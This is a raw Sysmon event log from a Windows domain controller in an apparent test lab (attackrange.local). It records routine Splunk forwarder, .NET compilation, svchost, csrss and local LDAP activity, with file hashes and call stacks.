23542300x800000000000000019234Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:50.014{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA0556017AD798A7AFF7066F1646FC4B,SHA256=FDE5C4D5055FDE1C5933BBB7F9E0C7CC13D12C662A497B7A604BDCCEF887F7CD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019255Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:51.904{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A13F-60D3-BE02-00000000CF01}2072C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019254Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:51.889{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A13F-60D3-BE02-00000000CF01}2072C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019253Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:51.889{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A13F-60D3-BE02-00000000CF01}2072C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000019252Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:50.270{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61376-false10.0.1.12-8000- 23542300x800000000000000019251Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:51.764{4DB9351A-A13E-60D3-BD02-00000000CF01}7064NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\GXD62PDA5J\System.Windows.Controls.Ribbon.ni.dll.auxMD5=908C18AF620ED724F990F12D78B2EBE1,SHA256=DFC1347B5DD13D0B89D980C90B215030CE858DEC767A9436D72B3E0B97080871,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019250Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:51.764{4DB9351A-A13E-60D3-BD02-00000000CF01}7064NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\GXD62PDA5J\System.Windows.Controls.Ribbon.ni.dllMD5=16FDF0EA6960164B47EA7D418D2AA1FF,SHA256=1D7D581848DB3B20E6D1A183D35FE4457257C3167795798ACC5381D19A118585,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019249Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:51.701{4DB9351A-A13E-60D3-BD02-00000000CF01}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1b98-0\System.Windows.Controls.Ribbon.dll2021-06-23 21:01:51.701 23542300x800000000000000019248Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:51.029{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF9565B5E6F7DEB6D5E52FCD2F674C47,SHA256=1E4A9450D45AAB6D40357058067A7B7EF64EF5FD6435FD24650FB6F27190307B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019260Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:52.910{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=36467C9CF229FBA77B6E3B535CAC95CF,SHA256=C62F1EFF7F6427B8C39E54EB59CD526CFF39006E5DEE4E2C38DFAAF9A2C0763D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019259Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:52.076{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A140-60D3-BF02-00000000CF01}6980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019258Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:52.061{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A140-60D3-BF02-00000000CF01}6980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019257Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:52.061{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A140-60D3-BF02-00000000CF01}6980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019256Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:52.061{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3BB4EF97F59A3936C19B2D8D2D9F627,SHA256=9BF0D9BF19749207418602E55620C2A3C65F54FB2135AC1B2DD524F01D6EE0BA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019280Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:53.942{4DB9351A-A141-60D3-C102-00000000CF01}53443656C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000019279Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:52.568{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local61377-true0:0:0:0:0:0:0:1win-dc-663.attackrange.local389ldap 354300x800000000000000019278Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:52.568{4DB9351A-9DEA-60D3-2B00-00000000CF01}3024C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local61377-true0:0:0:0:0:0:0:1win-dc-663.attackrange.local389ldap 10341000x800000000000000019277Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:53.708{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A141-60D3-C102-00000000CF01}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019276Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:53.708{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019275Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:53.708{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019274Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:53.708{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019273Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:53.708{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A141-60D3-C102-00000000CF01}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019272Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:53.708{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019271Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:53.708{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A141-60D3-C102-00000000CF01}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000019270Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:53.709{4DB9351A-A141-60D3-C102-00000000CF01}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000019269Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:53.113{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8071EE411A2CAC55FE9B0B88F306CC08,SHA256=5C7B991FBAC822ED572D2F141D41EDFA380262216A4DFDEBE4E909784E50C339,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019268Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:53.082{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A141-60D3-C002-00000000CF01}6648C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019267Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:53.082{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019266Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:53.082{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019265Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:53.082{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019264Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:53.082{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019263Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:53.082{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A141-60D3-C002-00000000CF01}6648C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019262Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:53.082{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A141-60D3-C002-00000000CF01}6648C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 